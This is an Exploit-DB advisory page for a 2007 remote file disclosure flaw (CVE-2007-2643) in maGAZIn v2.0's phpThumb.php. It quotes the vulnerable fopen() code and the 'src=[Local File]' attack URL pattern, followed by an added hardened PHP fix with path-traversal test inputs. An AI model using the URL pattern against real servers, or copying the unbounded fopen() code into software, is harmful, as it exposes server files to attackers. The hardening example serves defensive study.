- 18 Dec 2022
- EDB-ID
- 3901
- EDB Verified
- Passed
- Author
- DJ7XPL
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- cve-2007-2643
- Publication date
- 2007-05-11
Code:
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
---------------------------------------------------------------------
[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability
---------------------------------------------------------------------
---------------------------------------------------------------------
Vuln Code : Line (152 - 157)
[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
    $OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
    fclose($fp);
} else {
    ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
---------------------------------------------------------------------
---------------------------------------------------------------------
Bug :
http://[Target]/[Path]/phpThumb.php?src=[Local File]
Example :
---------------------------------------------------------------------
# milw0rm.com [2007-05-11]
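A hardened version of the fopen() pattern quoted above, added here as an example and not taken from maGAZIn or the exploit author: it canonicalizes the requested path with realpath(), requires the result to stay under a dedicated images directory, and restricts the extension. The function name, the allowlist and the directory layout are assumptions made for the demo.

```php
<?php
// Added example, not maGAZIn's own code: a hardened replacement for the
// phpThumb.php pattern above, which appends $_REQUEST['src'] straight onto
// DOCUMENT_ROOT. Assumes PHP 8 (str_contains / str_starts_with); the
// directory layout and file names below are constructed for the demo.
// Return the canonical path for $src only if it is a regular file inside
// $imagesRoot with an allowed extension; otherwise return null.
function resolve_image_path(string $src, string $imagesRoot): ?string
{
    $allowed = ['jpg', 'jpeg', 'png', 'gif']; // hypothetical allowlist
    // NUL bytes truncate paths in C-level file APIs; reject them outright.
    if (str_contains($src, "\0")) {
        return null;
    }
    $rootReal = realpath($imagesRoot);
    if ($rootReal === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, so the containment check
    // runs on the real location rather than on the attacker-controlled string.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . ltrim($src, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Must sit strictly below the root: the trailing separator stops a root of
    // "/srv/images" from accepting "/srv/images_private/secret.jpg".
    if (!str_starts_with($candidate, $rootReal . DIRECTORY_SEPARATOR)) {
        return null;
    }
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true) ? $candidate : null;
}

// Constructed fixture: an images root plus one file deliberately outside it.
$base = sys_get_temp_dir() . '/magazin_demo_' . getmypid();
$root = $base . '/images';
mkdir($root . '/gallery', 0700, true);
file_put_contents($root . '/gallery/cat.jpg', 'constructed sample');
file_put_contents($base . '/outside.txt', 'must never be served');
var_dump(resolve_image_path('gallery/cat.jpg', $root));             // inside root, allowed type
var_dump(resolve_image_path('../outside.txt', $root));              // escapes the root
var_dump(resolve_image_path('gallery/../../outside.txt', $root));   // escapes via nested ".."
var_dump(resolve_image_path("gallery/cat.jpg\0.txt", $root));      // embedded NUL byte

// Remove the constructed fixture.
unlink($root . '/gallery/cat.jpg');
unlink($base . '/outside.txt');
rmdir($root . '/gallery');
rmdir($root);
rmdir($base);
```

Only the first call yields a path; the three others return null, which is the behaviour the original fopen() line lacks because it never canonicalizes or bounds the user-supplied value.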
- Source
- www.exploit-db.com